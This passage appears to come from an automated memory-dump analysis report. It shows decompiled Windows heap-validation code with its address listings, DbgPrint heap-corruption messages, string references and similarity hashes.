										if( *_t300 != _t378) {
											_push(_t378);
											_push( *_t300);
											__eflags = 0;
											E6AC2A80D(0, 0xd, _t378, 0);
										} else {
											_t87 = _t415 + 8; // -16
											_t406 = _t87;
											 *_t406 = _t378;
											 *((intOrPtr*)(_t406 + 4)) = _t300;
											 *_t300 = _t406;
											 *((intOrPtr*)(_t378 + 4)) = _t406;
										}
										 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) + ( *_t415 & 0x0000ffff);
										_t405 =  *(_t414 + 0xb4);
										__eflags = _t405;
										if(_t405 == 0) {
											L61:
											__eflags =  *(_t414 + 0x4c);
											if(__eflags != 0) {
												 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
												 *_t415 =  *_t415 ^  *(_t414 + 0x50);
											}
											goto L86;
										} else {
											_t380 =  *_t415 & 0x0000ffff;
											while(1) {
												__eflags = _t380 -  *((intOrPtr*)(_t405 + 4));
												if(_t380 <  *((intOrPtr*)(_t405 + 4))) {
													break;
												}
												_t307 =  *_t405;
												__eflags = _t307;
												if(_t307 == 0) {
													_t309 =  *((intOrPtr*)(_t405 + 4)) - 1;
													L60:
													_t94 = _t415 + 8; // -16
													E6AB8E4A0(_t414, _t405, 1, _t94, _t309, _t380);
													goto L61;
												}
												_t405 = _t307;
											}
											_t309 = _t380;
											goto L60;
										}
									} else {
										_t407 =  *(_t414 + 0x4c);
										while(1) {
											__eflags = _t407;
											if(_t407 == 0) {
												_t312 =  *(_t378 - 8) & 0x0000ffff;
											} else {
												_t315 =  *(_t378 - 8);
												_t407 =  *(_t414 + 0x4c);
												__eflags = _t315 & _t407;
												if((_t315 & _t407) != 0) {
													_t315 = _t315 ^  *(_t414 + 0x50);
													__eflags = _t315;
												}
												_t312 = _t315 & 0x0000ffff;
											}
											__eflags = _v28 - (_t312 & 0x0000ffff);
											if(_v28 <= (_t312 & 0x0000ffff)) {
												goto L51;
											}
											_t378 =  *_t378;
											__eflags = _t414 + 0xc0 - _t378;
											if(_t414 + 0xc0 != _t378) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
								}
								_t317 = E6AB8A229(_t414, _t415);
								__eflags = _t317;
								if(_t317 != 0) {
									goto L39;
								}
								E6AB8A309(_t414, _t415,  *_t415 & 0x0000ffff, 1);
								goto L86;
							}
							_t385 =  *_t415 & 0x0000ffff;
							while(1) {
								__eflags = _t385 -  *((intOrPtr*)(_t402 + 4));
								if(_t385 <  *((intOrPtr*)(_t402 + 4))) {
									break;
								}
								_t320 =  *_t402;
								__eflags = _t320;
								if(_t320 == 0) {
									_t322 =  *((intOrPtr*)(_t402 + 4)) - 1;
									L34:
									_t63 = _t415 + 8; // -16
									E6AB8BC04(_t414, _t402, 1, _t63, _t322, _t385);
									_t374 = _v24;
									goto L35;
								}
								_t402 = _t320;
							}
							_t322 = _t385;
							goto L34;
						}
					}
					if(_a20 == 0) {
						L18:
						if(( *(_t415 + 2) & 0x00000004) == 0) {
							goto L67;
						}
						if(E6AC123E3(_t414, _t415) == 0) {
							goto L117;
						}
						goto L67;
					} else {
						if((_t390 & 0x00000002) == 0) {
							_t326 =  *(_t415 + 3) & 0x000000ff;
						} else {
							_t328 = E6AB61F5B(_t415);
							_t342 = _v20;
							_t326 =  *(_t328 + 2) & 0x0000ffff;
						}
						_t429 = _t326;
						if(_t429 == 0) {
							goto L18;
						}
						if(_t429 >= 0) {
							__eflags = _t326 & 0x00000800;
							if(__eflags != 0) {
								goto L18;
							}
							__eflags = _t326 -  *((intOrPtr*)(_t414 + 0x84));
							if(__eflags >= 0) {
								goto L18;
							}
							_t412 = _a20;
							_t327 = _t326 & 0x0000ffff;
							L17:
							 *((intOrPtr*)(_t412 + _t327 * 4)) =  *((intOrPtr*)(_t412 + _t327 * 4)) + _t342;
							goto L18;
						}
						_t327 = _t326 & 0x00007fff;
						if(_t327 >= 0x81) {
							goto L18;
						}
						_t412 = _a24;
						goto L17;
					}
					L86:
				} while (_t415 <  *((intOrPtr*)(_t332 + 0x28)));
				_t189 = _v12;
				goto L88;
			}

0x6ac24af7
0x6ac24afb
0x6ac24afd
0x6ac24b01
0x6ac24b03
0x6ac24b08
0x6ac24b0a
0x6ac24b0f
0x6ac24eb5
0x6ac24eb5
0x6ac24ebb
0x6ac250d5
0x6ac250d8
0x6ac24ff6
0x00000000
0x6ac24ff6
0x6ac250de
0x6ac250e4
0x6ac250e8
0x6ac25107
0x6ac2510c
0x6ac250ea
0x6ac250ff
0x6ac25104
0x6ac25112
0x6ac25115
0x6ac25118
0x6ac25119
0x6ac250cb
0x6ac250cb
0x6ac250af
0x00000000
0x6ac250af
0x6ac24ecb
0x6ac250b6
0x6ac250bb
0x6ac24ed1
0x6ac24ee6
0x6ac24eeb
0x6ac250c1
0x6ac250c2
0x6ac250c5
0x6ac250c6
0x00000000
0x00000000
0x00000000
0x00000000
0x6ac24b15
0x6ac24b15
0x6ac24b1c
0x6ac24b1e
0x6ac24b23
0x6ac24b27
0x6ac24b33
0x6ac24b38
0x6ac24b3a
0x6ac24b3c
0x6ac24b41
0x6ac24b41
0x6ac24b3a
0x6ac24b52
0x6ac25045
0x6ac2504b
0x6ac2504f
0x6ac2506e
0x6ac25073
0x6ac25051
0x6ac25066
0x6ac2506b
0x6ac25083
0x6ac25088
0x6ac25088
0x6ac2508a
0x6ac25091
0x6ac25099
0x6ac25099
0x6ac2509d
0x6ac250a7
0x6ac250ad
0x6ac250ad
0x6ac250ad
0x00000000
0x6ac2509d
0x6ac24b58
0x6ac24b5b
0x6ac24b5e
0x6ac24b63
0x6ac24b66
0x6ac24b69
0x6ac24b6f
0x6ac24be4
0x6ac24bf0
0x6ac24bf2
0x6ac24bf5
0x6ac24dc3
0x6ac24dc6
0x6ac24dc9
0x6ac24dce
0x6ac24dce
0x6ac24dd0
0x6ac24dd0
0x6ac24dd5
0x6ac24def
0x6ac24dd7
0x6ac24de7
0x6ac24de7
0x6ac24df3
0x6ac25001
0x6ac25007
0x6ac2500b
0x6ac2502a
0x6ac2502f
0x6ac2500d
0x6ac25022
0x6ac25027
0x6ac25039
0x6ac2503a
0x6ac2503b
0x00000000
0x6ac24df9
0x6ac24dfd
0x6ac24e90
0x6ac24e94
0x6ac24e9e
0x6ac24ea4
0x6ac24ea4
0x6ac24ea4
0x6ac24ea6
0x6ac24ea6
0x00000000
0x6ac24ea6
0x6ac24e03
0x6ac24e08
0x6ac24f88
0x6ac24f92
0x6ac24f99
0x6ac24f9c
0x6ac24fe0
0x6ac24fe4
0x6ac24fee
0x6ac24ff4
0x6ac24ff4
0x6ac24ff4
0x00000000
0x6ac24fe4
0x6ac24f9e
0x6ac24fa4
0x6ac24fa8
0x6ac24fc7
0x6ac24fcc
0x6ac24faa
0x6ac24fbf
0x6ac24fc4
0x6ac24fd2
0x6ac24fd5
0x6ac24fd6
0x6ac24f34
0x6ac24f34
0x00000000
0x6ac24f39
0x6ac24e0e
0x6ac24e14
0x6ac24e1b
0x6ac24e25
0x6ac24e2b
0x6ac24e2b
0x6ac24e33
0x6ac24e38
0x6ac24e8a
0x6ac24e8a
0x00000000
0x6ac24e3a
0x6ac24e3e
0x6ac24e43
0x6ac24e47
0x6ac24e53
0x6ac24e58
0x6ac24e5a
0x6ac24e5c
0x6ac24e61
0x6ac24e61
0x6ac24e5a
0x6ac24e6e
0x6ac24f41
0x6ac24f47
0x6ac24f4b
0x6ac24f6a
0x6ac24f6f
0x6ac24f4d
0x6ac24f62
0x6ac24f67
0x6ac24f7f
0x6ac24f80
0x6ac24f81
0x00000000
0x6ac24e74
0x6ac24e78
0x6ac24e82
0x6ac24e88
0x6ac24e88
0x00000000
0x6ac24e78
0x6ac24e6e
0x6ac24e38
0x6ac24df3
0x6ac24bfe
0x6ac24c01
0x6ac24c04
0x6ac24c07
0x6ac24c09
0x6ac24c0c
0x6ac24c0e
0x6ac24c0e
0x6ac24c11
0x6ac24c11
0x6ac24c0c
0x6ac24c14
0x6ac24c17
0x6ac24dae
0x6ac24db2
0x6ac24db7
0x6ac24dba
0x6ac24dbd
0x6ac24ef1
0x6ac24ef7
0x6ac24efb
0x6ac24f1a
0x6ac24f1f
0x6ac24efd
0x6ac24f12
0x6ac24f17
0x6ac24f2b
0x6ac24f2b
0x6ac24f2d
0x6ac24f2e
0x6ac24f2f
0x00000000
0x6ac24f2f
0x00000000
0x6ac24c1d
0x6ac24c1d
0x6ac24c20
0x6ac24c23
0x6ac24c26
0x6ac24c29
0x6ac24c2c
0x6ac24c2e
0x6ac24d91
0x6ac24d91
0x6ac24d92
0x6ac24d97
0x6ac24d9e
0x00000000
0x6ac24d9e
0x6ac24c34
0x6ac24c37
0x6ac24c39
0x6ac24c3c
0x00000000
0x00000000
0x6ac24c45
0x6ac24c48
0x6ac24c4e
0x6ac24c50
0x6ac24c78
0x6ac24c78
0x6ac24c7b
0x6ac24c7d
0x6ac24c80
0x6ac24c84
0x6ac24cad
0x6ac24cad
0x6ac24cb0
0x6ac24cb8
0x6ac24cbb
0x6ac24cbe
0x6ac24cc1
0x6ac24cc7
0x6ac24cdc
0x6ac24cc9
0x6ac24cd2
0x6ac24cd4
0x6ac24cd4
0x6ac24cde
0x6ac24ce0
0x6ac24d13
0x6ac24d13
0x6ac24d16
0x6ac24d18
0x6ac24d29
0x6ac24d2a
0x6ac24d2c
0x6ac24d34
0x6ac24d1a
0x6ac24d1a
0x6ac24d1a
0x6ac24d1d
0x6ac24d1f
0x6ac24d22
0x6ac24d24
0x6ac24d24
0x6ac24d3c
0x6ac24d3f
0x6ac24d45
0x6ac24d47
0x6ac24d6c
0x6ac24d6c
0x6ac24d70
0x6ac24d7e
0x6ac24d84
0x6ac24d84
0x00000000
0x6ac24d49
0x6ac24d49
0x6ac24d56
0x6ac24d56
0x6ac24d59
0x00000000
0x00000000
0x6ac24d4e
0x6ac24d50
0x6ac24d52
0x6ac24d8e
0x6ac24d5d
0x6ac24d5f
0x6ac24d67
0x00000000
0x6ac24d67
0x6ac24d54
0x6ac24d54
0x6ac24d5b
0x00000000
0x6ac24d5b
0x6ac24ce2
0x6ac24ce2
0x6ac24ce5
0x6ac24ce5
0x6ac24ce7
0x6ac24cfb
0x6ac24ce9
0x6ac24ce9
0x6ac24cec
0x6ac24cef
0x6ac24cf1
0x6ac24cf3
0x6ac24cf3
0x6ac24cf3
0x6ac24cf6
0x6ac24cf6
0x6ac24d02
0x6ac24d05
0x00000000
0x00000000
0x6ac24d07
0x6ac24d0f
0x6ac24d11
0x00000000
0x00000000
0x00000000
0x6ac24d11
0x00000000
0x6ac24ce5
0x6ac24ce0
0x6ac24c8a
0x6ac24c8f
0x6ac24c91
0x00000000
0x00000000
0x6ac24c9d
0x00000000
0x6ac24c9d
0x6ac24c52
0x6ac24c5f
0x6ac24c5f
0x6ac24c62
0x00000000
0x00000000
0x6ac24c57
0x6ac24c59
0x6ac24c5b
0x6ac24caa
0x6ac24c66
0x6ac24c68
0x6ac24c70
0x6ac24c75
0x00000000
0x6ac24c75
0x6ac24c5d
0x6ac24c5d
0x6ac24c64
0x00000000
0x6ac24c64
0x6ac24c17
0x6ac24b75
0x6ac24bc4
0x6ac24bc8
0x00000000
0x00000000
0x6ac24bd9
0x00000000
0x00000000
0x00000000
0x6ac24b77
0x6ac24b7a
0x6ac24b8c
0x6ac24b7c
0x6ac24b7e
0x6ac24b83
0x6ac24b86
0x6ac24b86
0x6ac24b90
0x6ac24b93
0x00000000
0x00000000
0x6ac24b95
0x6ac24bab
0x6ac24bb0
0x00000000
0x00000000
0x6ac24bb2
0x6ac24bb9
0x00000000
0x00000000
0x6ac24bbb
0x6ac24bbe
0x6ac24bc1
0x6ac24bc1
0x00000000
0x6ac24bc1
0x6ac24b97
0x6ac24ba4
0x00000000
0x00000000
0x6ac24ba6
0x00000000
0x6ac24ba6
0x6ac24ea9
0x6ac24ea9
0x6ac24eb2
0x00000000

APIs

RtlCompareMemoryUlong.1105(-00000008,?,FEEEFEEE), ref: 6AC24DB2
DbgPrint.1105(HEAP[%wZ]: ,-0000002C,-00000008,?,?), ref: 6AC24EE6
DbgPrint.1105(HEAP[%wZ]: ,-0000002C,-00000008,?,FEEEFEEE), ref: 6AC24F12
DbgPrint.1105(HEAP: ,-00000008,?,FEEEFEEE), ref: 6AC24F1F
DbgPrint.1105(Heap block at %p is not last block in segment (%p),-00000018,?), ref: 6AC24F34
DbgPrint.1105(HEAP[%wZ]: ,-0000002C), ref: 6AC24F62
DbgPrint.1105(HEAP: ), ref: 6AC24F6F
DbgPrint.1105(HEAP[%wZ]: ,-0000002C), ref: 6AC24FBF
DbgPrint.1105(HEAP: ), ref: 6AC24FCC
DbgPrint.1105(HEAP[%wZ]: ,-0000002C), ref: 6AC25022
DbgPrint.1105(HEAP: ), ref: 6AC2502F
DbgPrint.1105(HEAP[%wZ]: ,-0000002C), ref: 6AC25066
DbgPrint.1105(HEAP: ), ref: 6AC25073
DbgPrint.1105(Heap entry %p has incorrect PreviousSize field (%04x instead of %04x),-00000018,?,?), ref: 6AC25091
DbgPrint.1105(HEAP: ,-00000008,?,?), ref: 6AC250BB
DbgPrint.1105(Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x),?,00000000,?,-00000008,?,?), ref: 6AC250CB
DbgPrint.1105(HEAP[%wZ]: ,-0000002C,-00000008,?,?), ref: 6AC250FF
DbgPrint.1105(HEAP: ,-00000008,?,?), ref: 6AC2510C

Strings

Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x), xrefs: 6AC25119
Heap entry %p has incorrect PreviousSize field (%04x instead of %04x), xrefs: 6AC2508C
Heap block at %p has incorrect segment offset (%x), xrefs: 6AC2503B
Heap block at %p is not last block in segment (%p), xrefs: 6AC24FD6
Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x), xrefs: 6AC250C6
HEAP[%wZ]: , xrefs: 6AC24EE1, 6AC24F0D, 6AC24F5D, 6AC24FBA, 6AC2501D, 6AC25061, 6AC250FA
Free Heap block %p modified at %p after it was freed, xrefs: 6AC24F2F
Heap block at %p has corrupted PreviousSize (%lx), xrefs: 6AC24F81
HEAP: , xrefs: 6AC24F1A, 6AC24F6A, 6AC24FC7, 6AC2502A, 6AC2506E, 6AC250B6, 6AC25107

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: Print$CompareMemoryUlong
String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
API String ID: 2560481200-3591852110
Opcode ID: bf6d38a80af81f64d0d0f7c3ce483f621b79d21f43a8386cc9c5677e933319e1
Instruction ID: 3f0630bbd24b702ba3005a65792114bd090a8c5e678479cd5403ae1d720fe5f8
Opcode Fuzzy Hash: bf6d38a80af81f64d0d0f7c3ce483f621b79d21f43a8386cc9c5677e933319e1
Instruction Fuzzy Hash: 7512DF78200685EFE725CF29C594BBAB7F1FF49304F128559E4958B642EF34E880DB90

Uniqueness

Uniqueness Score: -1.00%

Function 6AC24496, Relevance: 45.9, APIs: 18, Strings: 8, Instructions: 417
memorynativeCOMMONCrypto

Download Yara Rule

C-Code - Quality: 55%

			E6AC24496(signed int* __ecx, void* __edx) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed char _v24;
				signed int* _v28;
				char _v32;
				signed int* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t150;
				intOrPtr _t151;
				signed char _t156;
				intOrPtr _t157;
				unsigned int _t169;
				intOrPtr _t170;
				signed int* _t183;
				signed char _t184;
				intOrPtr _t191;
				signed int _t201;
				intOrPtr _t203;
				intOrPtr _t212;
				intOrPtr _t220;
				signed int _t230;
				signed int _t241;
				signed int _t244;
				void* _t259;
				signed int _t260;
				signed int* _t261;
				intOrPtr* _t262;
				signed int _t263;
				signed int* _t264;
				signed int _t267;
				signed int* _t268;
				void* _t270;
				void* _t281;
				signed short _t285;
				signed short _t289;
				signed int _t291;
				signed int _t298;
				signed char _t303;
				signed char _t308;
				signed int _t314;
				intOrPtr _t317;
				unsigned int _t319;
				signed int* _t325;
				signed int _t326;
				signed int _t327;
				intOrPtr _t328;
				signed int _t329;
				signed int _t330;
				signed int* _t331;
				signed int _t332;
				signed int _t350;

				_t259 = __edx;
				_t331 = __ecx;
				_v28 = __ecx;
				_v20 = 0;
				_v12 = 0;
				_t150 = E6AC249A4(__ecx);
				_t267 = 1;
				if(_t150 == 0) {
					L61:
					_t151 =  *[fs:0x30];
					__eflags =  *((char*)(_t151 + 2));
					if( *((char*)(_t151 + 2)) != 0) {
						 *0x6ac56378 = _t267;
						asm("int3");
						 *0x6ac56378 = 0;
					}
					__eflags = _v12;
					if(_v12 != 0) {
						_t105 =  &_v16;
						 *_t105 = _v16 & 0x00000000;
						__eflags =  *_t105;
						E6AB9174B( &_v12,  &_v16, 0x8000);
					}
					L65:
					__eflags = 0;
					return 0;
				}
				if(_t259 != 0 || (__ecx[0x10] & 0x20000000) != 0) {
					_t268 =  &(_t331[0x30]);
					_v32 = 0;
					_t260 =  *_t268;
					_t308 = 0;
					_v24 = 0;
					while(_t268 != _t260) {
						_t260 =  *_t260;
						_v16 =  *_t325 & 0x0000ffff;
						_t156 = _t325[0];
						_v28 = _t325;
						_v5 = _t156;
						__eflags = _t156 & 0x00000001;
						if((_t156 & 0x00000001) != 0) {
							_t157 =  *[fs:0x30];
							__eflags =  *(_t157 + 0xc);
							if( *(_t157 + 0xc) == 0) {
								_push("HEAP: ");
								E6AB6B150();
							} else {
								E6AB6B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_t325);
							E6AB6B150("dedicated (%04Ix) free list element %p is marked busy\n", _v16);
							L32:
							_t270 = 0;
							__eflags = _t331[0x13];
							if(_t331[0x13] != 0) {
								_t325[0] = _t325[0] ^ _t325[0] ^  *_t325;
								 *_t325 =  *_t325 ^ _t331[0x14];
							}
							L60:
							_t267 = _t270 + 1;
							__eflags = _t267;
							goto L61;
						}
						_t169 =  *_t325 & 0x0000ffff;
						__eflags = _t169 - _t308;
						if(_t169 < _t308) {
							_t170 =  *[fs:0x30];
							__eflags =  *(_t170 + 0xc);
							if( *(_t170 + 0xc) == 0) {
								_push("HEAP: ");
								E6AB6B150();
							} else {
								E6AB6B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							E6AB6B150("Non-Dedicated free list element %p is out of order\n", _t325);
							goto L32;
						} else {
							__eflags = _t331[0x13];
							_t308 = _t169;
							_v24 = _t308;
							if(_t331[0x13] != 0) {
								_t325[0] = _t169 >> 0x00000008 ^ _v5 ^ _t308;
								 *_t325 =  *_t325 ^ _t331[0x14];
								__eflags =  *_t325;
							}
							_t26 =  &_v32;
							 *_t26 = _v32 + 1;
							__eflags =  *_t26;
							continue;
						}
					}
					_v16 = 0x208 + (_t331[0x21] & 0x0000ffff) * 4;
					if( *0x6ac56350 != 0 && _t331[0x2f] != 0) {
						_push(4);
						_push(0x1000);
						_push( &_v16);
						_push(0);
						_push( &_v12);
						_push(0xffffffff);
						if(E6ABA9660() >= 0) {
							_v20 = _v12 + 0x204;
						}
					}
					_t183 =  &(_t331[0x27]);
					_t281 = 0x81;
					_t326 =  *_t183;
					if(_t183 == _t326) {
						L49:
						_t261 =  &(_t331[0x29]);
						_t184 = 0;
						_t327 =  *_t261;
						_t282 = 0;
						_v24 = 0;
						_v36 = 0;
						__eflags = _t327 - _t261;
						if(_t327 == _t261) {
							L53:
							_t328 = _v32;
							_v28 = _t331;
							__eflags = _t328 - _t184;
							if(_t328 == _t184) {
								__eflags = _t331[0x1d] - _t282;
								if(_t331[0x1d] == _t282) {
									__eflags = _v12;
									if(_v12 == 0) {
										L82:
										_t267 = 1;
										__eflags = 1;
										goto L83;
									}
									_t329 = _t331[0x2f];
									__eflags = _t329;
									if(_t329 == 0) {
										L77:
										_t330 = _t331[0x22];
										__eflags = _t330;
										if(_t330 == 0) {
											L81:
											_t129 =  &_v16;
											 *_t129 = _v16 & 0x00000000;
											__eflags =  *_t129;
											E6AB9174B( &_v12,  &_v16, 0x8000);
											goto L82;
										}
										_t314 = _t331[0x21] & 0x0000ffff;
										_t285 = 1;
										__eflags = 1 - _t314;
										if(1 >= _t314) {
											goto L81;
										} else {
											goto L79;
										}
										while(1) {
											L79:
											_t330 = _t330 + 0x40;
											_t332 = _t285 & 0x0000ffff;
											_t262 = _v20 + _t332 * 4;
											__eflags =  *_t262 -  *((intOrPtr*)(_t330 + 8));
											if( *_t262 !=  *((intOrPtr*)(_t330 + 8))) {
												break;
											}
											_t285 = _t285 + 1;
											__eflags = _t285 - _t314;
											if(_t285 < _t314) {
												continue;
											}
											goto L81;
										}
										_t191 =  *[fs:0x30];
										__eflags =  *(_t191 + 0xc);
										if( *(_t191 + 0xc) == 0) {
											_push("HEAP: ");
											E6AB6B150();
										} else {
											E6AB6B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push(_t262);
										_push( *((intOrPtr*)(_v20 + _t332 * 4)));
										_push( *((intOrPtr*)(_t330 + 8)));
										_push(_t330 + 0x10);
										E6AB6B150("Tag %04x (%ws) size incorrect (%Ix != %Ix) %p\n", _t332);
										L59:
										_t270 = 0;
										__eflags = 0;
										goto L60;
									}
									_t289 = 1;
									__eflags = 1;
									while(1) {
										_t201 = _v12;
										_t329 = _t329 + 0xc;
										_t263 = _t289 & 0x0000ffff;
										__eflags =  *((intOrPtr*)(_t201 + _t263 * 4)) -  *((intOrPtr*)(_t329 + 8));
										if( *((intOrPtr*)(_t201 + _t263 * 4)) !=  *((intOrPtr*)(_t329 + 8))) {
											break;
										}
										_t289 = _t289 + 1;
										__eflags = _t289 - 0x81;
										if(_t289 < 0x81) {
											continue;
										}
										goto L77;
									}
									_t203 =  *[fs:0x30];
									__eflags =  *(_t203 + 0xc);
									if( *(_t203 + 0xc) == 0) {
										_push("HEAP: ");
										E6AB6B150();
									} else {
										E6AB6B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									}
									_t291 = _v12;
									_push(_t291 + _t263 * 4);
									_push( *((intOrPtr*)(_t291 + _t263 * 4)));
									_push( *((intOrPtr*)(_t329 + 8)));
									E6AB6B150("Pseudo Tag %04x size incorrect (%Ix != %Ix) %p\n", _t263);
									goto L59;
								}
								_t212 =  *[fs:0x30];
								__eflags =  *(_t212 + 0xc);
								if( *(_t212 + 0xc) == 0) {
									_push("HEAP: ");
									E6AB6B150();
								} else {
									E6AB6B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(_t331[0x1d]);
								_push(_v36);
								_push("Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)\n");
								L58:
								E6AB6B150();
								goto L59;
							}
							_t220 =  *[fs:0x30];
							__eflags =  *(_t220 + 0xc);
							if( *(_t220 + 0xc) == 0) {
								_push("HEAP: ");
								E6AB6B150();
							} else {
								E6AB6B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_t328);
							_push(_v24);
							_push("Number of free blocks in arena (%ld) does not match number in the free lists (%ld)\n");
							goto L58;
						} else {
							goto L50;
						}
						while(1) {
							L50:
							_t92 = _t327 - 0x10; // -24
							_t282 = _t331;
							_t230 = E6AC24AEF(_t331, _t92, _t331,  &_v24,  &_v36,  &_v28, _v20, _v12);
							__eflags = _t230;
							if(_t230 == 0) {
								goto L59;
							}
							_t327 =  *_t327;
							__eflags = _t327 - _t261;
							if(_t327 != _t261) {
								continue;
							}
							_t184 = _v24;
							_t282 = _v36;
							goto L53;
						}
						goto L59;
					} else {
						while(1) {
							_t39 = _t326 + 0x18; // 0x10
							_t264 = _t39;
							if(_t331[0x13] != 0) {
								_t319 = _t331[0x14] ^  *_t264;
								 *_t264 = _t319;
								_t303 = _t319 >> 0x00000010 ^ _t319 >> 0x00000008 ^ _t319;
								_t348 = _t319 >> 0x18 - _t303;
								if(_t319 >> 0x18 != _t303) {
									_push(_t303);
									E6AC1FA2B(_t264, _t331, _t264, _t326, _t331, _t348);
								}
								_t281 = 0x81;
							}
							_t317 = _v20;
							if(_t317 != 0) {
								_t241 =  *(_t326 + 0xa) & 0x0000ffff;
								_t350 = _t241;
								if(_t350 != 0) {
									if(_t350 >= 0) {
										__eflags = _t241 & 0x00000800;
										if(__eflags == 0) {
											__eflags = _t241 - _t331[0x21];
											if(__eflags < 0) {
												_t298 = _t241;
												_t65 = _t317 + _t298 * 4;
												 *_t65 =  *(_t317 + _t298 * 4) + ( *(_t326 + 0x10) >> 3);
												__eflags =  *_t65;
											}
										}
									} else {
										_t244 = _t241 & 0x00007fff;
										if(_t244 < _t281) {
											 *((intOrPtr*)(_v12 + _t244 * 4)) =  *((intOrPtr*)(_v12 + _t244 * 4)) + ( *(_t326 + 0x10) >> 3);
										}
									}
								}
							}
							if(( *(_t326 + 0x1a) & 0x00000004) != 0 && E6AC123E3(_t331, _t264) == 0) {
								break;
							}
							if(_t331[0x13] != 0) {
								_t264[0] = _t264[0] ^ _t264[0] ^  *_t264;
								 *_t264 =  *_t264 ^ _t331[0x14];
							}
							_t326 =  *_t326;
							if( &(_t331[0x27]) == _t326) {
								goto L49;
							} else {
								_t281 = 0x81;
								continue;
							}
						}
						__eflags = _t331[0x13];
						if(_t331[0x13] != 0) {
							 *(_t326 + 0x1b) =  *(_t326 + 0x1a) ^  *(_t326 + 0x19) ^  *(_t326 + 0x18);
							 *(_t326 + 0x18) =  *(_t326 + 0x18) ^ _t331[0x14];
						}
						goto L65;
					}
				} else {
					L83:
					return _t267;
				}
			}

0x6ac244a1
0x6ac244a3
0x6ac244a7
0x6ac244ac
0x6ac244af
0x6ac244b2
0x6ac244b9
0x6ac244bc
0x6ac247f2
0x6ac247f2
0x6ac247f8
0x6ac247fc
0x6ac247fe
0x6ac24804
0x6ac24805
0x6ac24805
0x6ac2480c
0x6ac24810
0x6ac24812
0x6ac24812
0x6ac24812
0x6ac24822
0x6ac24822
0x6ac24827
0x6ac24827
0x00000000
0x6ac24827
0x6ac244c4
0x6ac244d3
0x6ac244d9
0x6ac244dc
0x6ac244de
0x6ac244e0
0x6ac24560
0x6ac24520
0x6ac24522
0x6ac24525
0x6ac24528
0x6ac2452b
0x6ac2452e
0x6ac24530
0x6ac24697
0x6ac2469d
0x6ac246a1
0x6ac246c0
0x6ac246c5
0x6ac246a3
0x6ac246b8
0x6ac246bd
0x6ac246cb
0x6ac246d4
0x6ac24677
0x6ac24677
0x6ac24679
0x6ac2467c
0x6ac2468a
0x6ac24690
0x6ac24690
0x6ac247f1
0x6ac247f1
0x6ac247f1
0x00000000
0x6ac247f1
0x6ac24536
0x6ac24539
0x6ac2453c
0x6ac24636
0x6ac2463c
0x6ac24640
0x6ac2465f
0x6ac24664
0x6ac24642
0x6ac24657
0x6ac2465c
0x6ac24670
0x00000000
0x6ac24542
0x6ac24542
0x6ac24546
0x6ac24548
0x6ac2454b
0x6ac24555
0x6ac2455b
0x6ac2455b
0x6ac2455b
0x6ac2455d
0x6ac2455d
0x6ac2455d
0x00000000
0x6ac2455d
0x6ac2453c
0x6ac24579
0x6ac2457c
0x6ac24587
0x6ac24589
0x6ac24591
0x6ac24592
0x6ac24597
0x6ac24598
0x6ac245a1
0x6ac245ab
0x6ac245ab
0x6ac245a1
0x6ac245ae
0x6ac245b4
0x6ac245b9
0x6ac245bd
0x6ac24759
0x6ac24759
0x6ac2475f
0x6ac24761
0x6ac24763
0x6ac24765
0x6ac24768
0x6ac2476b
0x6ac2476d
0x6ac2479c
0x6ac2479c
0x6ac2479f
0x6ac247a2
0x6ac247a4
0x6ac24830
0x6ac24833
0x6ac24879
0x6ac2487d
0x6ac248f1
0x6ac248f3
0x6ac248f3
0x00000000
0x6ac248f3
0x6ac2487f
0x6ac24885
0x6ac24887
0x6ac248a8
0x6ac248a8
0x6ac248ae
0x6ac248b0
0x6ac248dc
0x6ac248dc
0x6ac248dc
0x6ac248dc
0x6ac248ec
0x00000000
0x6ac248ec
0x6ac248b2
0x6ac248bc
0x6ac248be
0x6ac248c1
0x00000000
0x00000000
0x00000000
0x00000000
0x6ac248c3
0x6ac248c3
0x6ac248c6
0x6ac248c9
0x6ac248cc
0x6ac248d1
0x6ac248d4
0x00000000
0x00000000
0x6ac248d6
0x6ac248d7
0x6ac248da
0x00000000
0x00000000
0x00000000
0x6ac248da
0x6ac2494f
0x6ac24955
0x6ac24959
0x6ac24978
0x6ac2497d
0x6ac2495b
0x6ac24970
0x6ac24975
0x6ac24986
0x6ac24987
0x6ac2498d
0x6ac24990
